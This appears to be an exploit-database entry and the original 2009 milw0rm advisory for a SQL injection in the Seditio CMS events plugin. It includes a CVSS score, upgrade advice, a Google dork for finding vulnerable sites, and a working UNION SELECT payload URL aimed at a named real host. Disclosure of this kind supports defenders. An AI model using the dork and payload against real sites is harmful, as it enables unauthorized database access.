Seditio Events Remote SQL Injection

vendor:

Seditio CMS

by:

OoN_Boy

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Seditio CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Seditio Events Remote SQL Injection

A vulnerability exists in Seditio CMS which allows an attacker to inject arbitrary SQL commands via the 'plug.php?e=events&f=old&c=all' parameter. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary commands.

Mitigation:

Upgrade to the latest version of Seditio CMS.

Source

Exploit-DB raw data:

[+]=================================================================[+]
		[x]Title    : Seditio Events Remote SQL Injection
				      Seditio Events Plugin Remote SQL Injection
		[x]Software : Seditio CMS
		[x]Vendor   : www.neocrome.ne
		[x]Date     : 17 April 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
		[x]Contact  : oon.boy9@gmail.com
		[x]Blog     : http://oonboy.blogspot.com
[+]=================================================================[+]
		[x] Google Dork

		"Powered by Seditio"
[+]=================================================================[+]
		[x] Exploit

		http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
[+]=================================================================[x]
		[x]Poc
		
		http://thespider.neocrome.org/plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*
[+]=================================================================[+]
		[x] Special Greetz
		
		www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - 
		Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
		xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, 
		Dan buat semuanya yg ga bisa di sebut satuÂ²
[+]=================================================================[+]

# milw0rm.com [2009-04-20]